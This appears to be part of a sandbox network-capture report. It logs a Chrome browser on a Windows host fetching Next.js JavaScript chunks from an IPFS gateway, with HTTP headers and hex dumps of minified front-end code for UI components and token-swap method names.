                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 6d 22 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 2c 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 2c 66 6c 65 78 53 68 72 69 6e 6b 3a 30 2c 66 6f 6e 74 53 69 7a 65 3a 7b 69 6e 68 65 72 69 74 3a 22 69 6e 68 65 72 69 74 22 2c 73 6d 61 6c 6c 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 30 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 74 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d
                                                                                                                                                                                                                                                  Data Ascii: m",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[t.fontSize],color:{primary:(e.vars||e).palette.primary.m
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 41 72 72 61 79 28 65 29 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 3b 72 65 74 75 72 6e 20 72 2e 72 65 64 75 63 65 28 28 28 65 2c 6e 2c 6f 29 3d 3e 28 65 2e 70 75 73 68 28 6e 29 2c 6f 3c 72 2e 6c 65 6e 67 74 68 2d 31 26 26 65 2e 70 75 73 68 28 69 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 74 2c 7b 6b 65 79 3a 60 73 65 70 61 72 61 74 6f 72 2d 24 7b 6f 7d 60 7d 29 29 2c 65 29 29 2c 5b 5d 29 7d 63 6f 6e 73 74 20 76 3d 28 30 2c 6c 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 5b 74 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 74 7d 29 3d 3e 7b 6c 65 74 20 72 3d
                                                                                                                                                                                                                                                  Data Ascii: Array(e).filter(Boolean);return r.reduce(((e,n,o)=>(e.push(n),o<r.length-1&&e.push(i.cloneElement(t,{key:`separator-${o}`})),e)),[])}const v=(0,l.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,t)=>[t.root]})((({ownerState:e,theme:t})=>{let r=
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 3d 6d 7d 2c 35 32 31 30 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 72 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 44 69 72 65 63 74 43 6f 6e 74 72 61 63 74 4d 65 74 68 6f 64 73 3d 74 2e 44 69 72 65 63 74 43 6f 6e 74 72 61 63 74 4d 65 74 68 6f 64 73 57 69 74 68 46 65 65 4d 6f 64 65 6c 3d 74 2e 43 6f 6e 74 72 61 63 74 4d 65 74 68 6f 64 3d 74 2e 53 77 61 70 53 69 64 65 3d 76 6f 69 64 20 30 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 42 55 59 3d 22 42 55 59 22 2c 65 2e 53 45 4c 4c 3d 22 53 45 4c 4c 22 7d 28 74 2e 53 77 61 70 53 69 64 65 7c 7c 28 74 2e 53 77 61 70 53 69 64 65 3d 7b 7d 29 29 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65
                                                                                                                                                                                                                                                  Data Ascii: =m},52102:function(e,t){var r;Object.defineProperty(t,"__esModule",{value:!0}),t.DirectContractMethods=t.DirectContractMethodsWithFeeModel=t.ContractMethod=t.SwapSide=void 0,function(e){e.BUY="BUY",e.SELL="SELL"}(t.SwapSide||(t.SwapSide={})),function(e){e
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 77 61 70 4f 6e 55 6e 69 73 77 61 70 46 6f 72 6b 2c 72 2e 62 75 79 4f 6e 55 6e 69 73 77 61 70 46 6f 72 6b 2c 72 2e 73 77 61 70 4f 6e 55 6e 69 73 77 61 70 56 32 46 6f 72 6b 2c 72 2e 62 75 79 4f 6e 55 6e 69 73 77 61 70 56 32 46 6f 72 6b 2c 72 2e 73 77 61 70 4f 6e 5a 65 72 6f 58 76 32 2c 72 2e 73 77 61 70 4f 6e 5a 65 72 6f 58 76 34 5d 2e 63 6f 6e 63 61 74 28 74 2e 44 69 72 65 63 74 43 6f 6e 74 72 61 63 74 4d 65 74 68 6f 64 73 57 69 74 68 46 65 65 4d 6f 64 65 6c 29 7d 2c 33 32 35 32 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 74 2e 4f 5a 3d 74 2e 50 43 3d 76 6f 69 64 20 30 3b 76 61 72 20 6e 3d 72 28 35 32 31 30 32 29 3b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 50 43 22 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c
                                                                                                                                                                                                                                                  Data Ascii: wapOnUniswapFork,r.buyOnUniswapFork,r.swapOnUniswapV2Fork,r.buyOnUniswapV2Fork,r.swapOnZeroXv2,r.swapOnZeroXv4].concat(t.DirectContractMethodsWithFeeModel)},32524:function(e,t,r){t.OZ=t.PC=void 0;var n=r(52102);Object.defineProperty(t,"PC",{enumerable:!0,
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 52 65 66 6c 65 63 74 7c 7c 21 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 29 72 65 74 75 72 6e 21 31 3b 69 66 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 50 72 6f 78 79 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 70 3d 6c 28 29 3f 52 65 66 6c
                                                                                                                                                                                                                                                  Data Ascii: Reflect||!Reflect.construct)return!1;if(Reflect.construct.sham)return!1;if("function"===typeof Proxy)return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],(function(){}))),!0}catch(e){return!1}}function p(e,t,r){return p=l()?Refl
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 61 74 6f 72 22 2c 63 3d 6f 2e 74 6f 53 74 72 69 6e 67 54 61 67 7c 7c 22 40 40 74 6f 53 74 72 69 6e 67 54 61 67 22 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 74 2c 7b 76 61 6c 75 65 3a 72 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 2c 77 72 69 74 61 62 6c 65 3a 21 30 7d 29 2c 65 5b 74 5d 7d 74 72 79 7b 73 28 7b 7d 2c 22 22 29 7d 63 61 74 63 68 28 43 29 7b 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 65 74 75 72 6e 20 65 5b 74 5d 3d 72 7d 7d 66 75 6e 63 74 69 6f 6e 20 75 28 65 2c 74 2c 72 2c 6e 29 7b 76 61 72 20 6f 3d 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 20 69 6e 73 74 61 6e 63 65 6f 66 20
                                                                                                                                                                                                                                                  Data Ascii: ator",c=o.toStringTag||"@@toStringTag";function s(e,t,r){return Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}),e[t]}try{s({},"")}catch(C){s=function(e,t,r){return e[t]=r}}function u(e,t,r,n){var o=t&&t.prototype instanceof
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 5f 69 6e 76 6f 6b 65 28 74 2c 65 29 7d 29 29 7d 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4f 28 65 2c 74 29 7b 66 75 6e 63 74 69 6f 6e 20 72 28 6f 2c 69 2c 61 2c 63 29 7b 76 61 72 20 73 3d 6c 28 65 5b 6f 5d 2c 65 2c 69 29 3b 69 66 28 22 74 68 72 6f 77 22 21 3d 3d 73 2e 74 79 70 65 29 7b 76 61 72 20 75 3d 73 2e 61 72 67 2c 70 3d 75 2e 76 61 6c 75 65 3b 72 65 74 75 72 6e 20 70 26 26 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 70 26 26 6e 2e 63 61 6c 6c 28 70 2c 22 5f 5f 61 77 61 69 74 22 29 3f 74 2e 72 65 73 6f 6c 76 65 28 70 2e 5f 5f 61 77 61 69 74 29 2e 74 68 65 6e 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 28 22 6e 65 78 74 22 2c 65 2c 61 2c 63 29 7d 29 2c 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b
                                                                                                                                                                                                                                                  Data Ascii: on(e){return this._invoke(t,e)}))}))}function O(e,t){function r(o,i,a,c){var s=l(e[o],e,i);if("throw"!==s.type){var u=s.arg,p=u.value;return p&&"object"===typeof p&&n.call(p,"__await")?t.resolve(p.__await).then((function(e){r("next",e,a,c)}),(function(e){
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 74 68 69 73 2e 72 65 73 65 74 28 21 30 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 69 66 28 65 29 7b 76 61 72 20 72 3d 65 5b 69 5d 3b 69 66 28 72 29 72 65 74 75 72 6e 20 72 2e 63 61 6c 6c 28 65 29 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 65 2e 6e 65 78 74 29 72 65 74 75 72 6e 20 65 3b 69 66 28 21 69 73 4e 61 4e 28 65 2e 6c 65 6e 67 74 68 29 29 7b 76 61 72 20 6f 3d 2d 31 2c 61 3d 66 75 6e 63 74 69 6f 6e 20 72 28 29 7b 66 6f 72 28 3b 2b 2b 6f 3c 65 2e 6c 65 6e 67 74 68 3b 29 69 66 28 6e 2e 63 61 6c 6c 28 65 2c 6f 29 29 72 65 74 75 72 6e 20 72 2e 76 61 6c 75 65 3d 65 5b 6f 5d 2c 72 2e 64 6f 6e 65 3d 21 31 2c 72 3b 72 65 74 75 72 6e 20 72 2e 76 61 6c 75 65 3d 74 2c 72 2e 64 6f 6e 65 3d 21 30 2c 72 7d 3b 72 65 74 75 72 6e 20
                                                                                                                                                                                                                                                  Data Ascii: this.reset(!0)}function P(e){if(e){var r=e[i];if(r)return r.call(e);if("function"===typeof e.next)return e;if(!isNaN(e.length)){var o=-1,a=function r(){for(;++o<e.length;)if(n.call(e,o))return r.value=e[o],r.done=!1,r;return r.value=t,r.done=!0,r};return


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  13192.168.2.549725209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC739OUTGET /_next/static/chunks/3652.76d2fc48524771f4.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1358INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:40 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 7220
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreic4ifwyjs7ekuekrsbx4g5xsfipcix46uqrucinh3dvmtmefngysu"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/3652.76d2fc48524771f4.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreic4ifwyjs7ekuekrsbx4g5xsfipcix46uqrucinh3dvmtmefngysu
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 646863
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 62 62 62 63 61 37 32 39 33 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e40bbbca7293-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1306INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 33 36 35 32 5d 2c 7b 38 37 30 35 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 5a 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 7d 29 3b 76 61 72 20 6f 3d 72 28 36 33 33 36 36 29 2c 61 3d 72 28 38 37 34 36 32 29 2c 69 3d 72 28 36 37 32 39 34 29 2c 6e 3d 72 28 38 36 30 31 30 29 2c 6c 3d 72 28 39 34 37 38 30 29 2c 73 3d 72 28 34 31 37 39 36 29 2c 64 3d 72 28 38 33 31 38 37 29 2c 63 3d 72 28 33 36 36 32 32 29 2c 75 3d 72 28 37 38 38 38 34 29 2c 70 3d 72 28 38 31 37 31 39 29 2c 66 3d 72 28 33 34 38 36 37 29
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[3652],{87054:function(e,t,r){r.d(t,{Z:function(){return y}});var o=r(63366),a=r(87462),i=r(67294),n=r(86010),l=r(94780),s=r(41796),d=r(83187),c=r(36622),u=r(78884),p=r(81719),f=r(34867)
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 31 70 78 20 73 6f 6c 69 64 20 24 7b 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 42 61 63 6b 67 72 6f 75 6e 64 7d 60 7d 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 74 65 78 74 44 65 63 6f 72 61 74 69 6f 6e 3a 22 6e 6f 6e 65 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 65 2e 76 61 72 73 3f 60 72 67 62 61 28 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 70 72 69 6d 61 72 79 43 68 61 6e 6e 65 6c 7d 20 2f 20 24 7b 65 2e 76 61 72 73 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76 65 72 4f 70 61 63 69 74 79 7d 29 60 3a 28 30 2c 73 2e 46 71 29 28 65 2e 70 61 6c 65 74 74 65 2e 74 65 78 74 2e 70 72 69 6d 61 72 79 2c 65 2e 70 61 6c 65 74 74 65 2e 61 63 74 69 6f 6e 2e 68 6f 76
                                                                                                                                                                                                                                                  Data Ascii: 1px solid ${(e.vars||e).palette.action.disabledBackground}`},"&:hover":{textDecoration:"none",backgroundColor:e.vars?`rgba(${e.vars.palette.text.primaryChannel} / ${e.vars.palette.action.hoverOpacity})`:(0,s.Fq)(e.palette.text.primary,e.palette.action.hov
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 6f 72 3a 6e 7d 3d 65 2c 73 3d 7b 72 6f 6f 74 3a 5b 22 72 6f 6f 74 22 2c 6f 26 26 22 73 65 6c 65 63 74 65 64 22 2c 61 26 26 22 64 69 73 61 62 6c 65 64 22 2c 72 26 26 22 66 75 6c 6c 57 69 64 74 68 22 2c 60 73 69 7a 65 24 7b 28 30 2c 63 2e 5a 29 28 69 29 7d 60 2c 6e 5d 7d 3b 72 65 74 75 72 6e 28 30 2c 6c 2e 5a 29 28 73 2c 67 2c 74 29 7d 29 28 7a 29 3b 72 65 74 75 72 6e 28 30 2c 76 2e 6a 73 78 29 28 6d 2c 28 30 2c 61 2e 5a 29 28 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c 6e 2e 64 65 66 61 75 6c 74 29 28 77 2e 72 6f 6f 74 2c 73 29 2c 64 69 73 61 62 6c 65 64 3a 70 2c 66 6f 63 75 73 52 69 70 70 6c 65 3a 21 66 2c 72 65 66 3a 74 2c 6f 6e 43 6c 69 63 6b 3a 65 3d 3e 7b 52 26 26 28 52 28 65 2c 24 29 2c 65 2e 64 65 66 61 75 6c 74 50 72 65 76 65 6e 74 65 64 29 7c 7c 79
                                                                                                                                                                                                                                                  Data Ascii: or:n}=e,s={root:["root",o&&"selected",a&&"disabled",r&&"fullWidth",`size${(0,c.Z)(i)}`,n]};return(0,l.Z)(s,g,t)})(z);return(0,v.jsx)(m,(0,a.Z)({className:(0,n.default)(w.root,s),disabled:p,focusRipple:!f,ref:t,onClick:e=>{R&&(R(e,$),e.defaultPrevented)||y
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 30 30 25 22 7d 2c 7b 5b 60 26 20 2e 24 7b 67 2e 67 72 6f 75 70 65 64 7d 60 5d 3a 28 30 2c 61 2e 5a 29 28 7b 7d 2c 22 68 6f 72 69 7a 6f 6e 74 61 6c 22 3d 3d 3d 65 2e 6f 72 69 65 6e 74 61 74 69 6f 6e 3f 7b 22 26 3a 6e 6f 74 28 3a 66 69 72 73 74 2d 6f 66 2d 74 79 70 65 29 22 3a 7b 6d 61 72 67 69 6e 4c 65 66 74 3a 2d 31 2c 62 6f 72 64 65 72 4c 65 66 74 3a 22 31 70 78 20 73 6f 6c 69 64 20 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 62 6f 72 64 65 72 54 6f 70 4c 65 66 74 52 61 64 69 75 73 3a 30 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 4c 65 66 74 52 61 64 69 75 73 3a 30 7d 2c 22 26 3a 6e 6f 74 28 3a 6c 61 73 74 2d 6f 66 2d 74 79 70 65 29 22 3a 7b 62 6f 72 64 65 72 54 6f 70 52 69 67 68 74 52 61 64 69 75 73 3a 30 2c 62 6f 72 64 65 72 42 6f 74 74 6f 6d 52 69 67 68 74 52
                                                                                                                                                                                                                                                  Data Ascii: 00%"},{[`& .${g.grouped}`]:(0,a.Z)({},"horizontal"===e.orientation?{"&:not(:first-of-type)":{marginLeft:-1,borderLeft:"1px solid transparent",borderTopLeftRadius:0,borderBottomLeftRadius:0},"&:not(:last-of-type)":{borderTopRightRadius:0,borderBottomRightR
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1369INData Raw: 66 3a 74 2c 6f 77 6e 65 72 53 74 61 74 65 3a 77 7d 2c 7a 2c 7b 63 68 69 6c 64 72 65 6e 3a 69 2e 43 68 69 6c 64 72 65 6e 2e 6d 61 70 28 73 2c 28 65 3d 3e 69 2e 69 73 56 61 6c 69 64 45 6c 65 6d 65 6e 74 28 65 29 3f 69 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 65 2c 7b 63 6c 61 73 73 4e 61 6d 65 3a 28 30 2c 6e 2e 64 65 66 61 75 6c 74 29 28 6b 2e 67 72 6f 75 70 65 64 2c 65 2e 70 72 6f 70 73 2e 63 6c 61 73 73 4e 61 6d 65 29 2c 6f 6e 43 68 61 6e 67 65 3a 79 3f 53 3a 42 2c 73 65 6c 65 63 74 65 64 3a 76 6f 69 64 20 30 3d 3d 3d 65 2e 70 72 6f 70 73 2e 73 65 6c 65 63 74 65 64 3f 75 28 65 2e 70 72 6f 70 73 2e 76 61 6c 75 65 2c 78 29 3a 65 2e 70 72 6f 70 73 2e 73 65 6c 65 63 74 65 64 2c 73 69 7a 65 3a 65 2e 70 72 6f 70 73 2e 73 69 7a 65 7c 7c 24 2c 66 75 6c 6c 57 69
                                                                                                                                                                                                                                                  Data Ascii: f:t,ownerState:w},z,{children:i.Children.map(s,(e=>i.isValidElement(e)?i.cloneElement(e,{className:(0,n.default)(k.grouped,e.props.className),onChange:y?S:B,selected:void 0===e.props.selected?u(e.props.value,x):e.props.selected,size:e.props.size||$,fullWi
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC438INData Raw: 65 6e 74 52 65 73 75 6c 74 28 29 29 29 2c 6f 2e 75 73 65 45 66 66 65 63 74 28 28 28 29 3d 3e 7b 67 2e 73 65 74 4f 70 74 69 6f 6e 73 28 66 2c 7b 6c 69 73 74 65 6e 65 72 73 3a 21 31 7d 29 7d 29 2c 5b 66 2c 67 5d 29 2c 28 30 2c 63 2e 53 42 29 28 66 2c 68 2c 75 29 29 74 68 72 6f 77 28 30 2c 63 2e 6a 38 29 28 66 2c 67 2c 70 29 3b 69 66 28 28 30 2c 64 2e 4b 4a 29 28 7b 72 65 73 75 6c 74 3a 68 2c 65 72 72 6f 72 52 65 73 65 74 42 6f 75 6e 64 61 72 79 3a 70 2c 75 73 65 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 3a 66 2e 75 73 65 45 72 72 6f 72 42 6f 75 6e 64 61 72 79 2c 71 75 65 72 79 3a 67 2e 67 65 74 43 75 72 72 65 6e 74 51 75 65 72 79 28 29 7d 29 29 74 68 72 6f 77 20 68 2e 65 72 72 6f 72 3b 72 65 74 75 72 6e 20 66 2e 6e 6f 74 69 66 79 4f 6e 43 68 61 6e 67 65 50 72
                                                                                                                                                                                                                                                  Data Ascii: entResult())),o.useEffect((()=>{g.setOptions(f,{listeners:!1})}),[f,g]),(0,c.SB)(f,h,u))throw(0,c.j8)(f,g,p);if((0,d.KJ)({result:h,errorResetBoundary:p,useErrorBoundary:f.useErrorBoundary,query:g.getCurrentQuery()}))throw h.error;return f.notifyOnChangePr


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  14192.168.2.549726209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC739OUTGET /_next/static/chunks/1497.8e36954048946218.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:40 UTC1357INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:40 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 7890
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
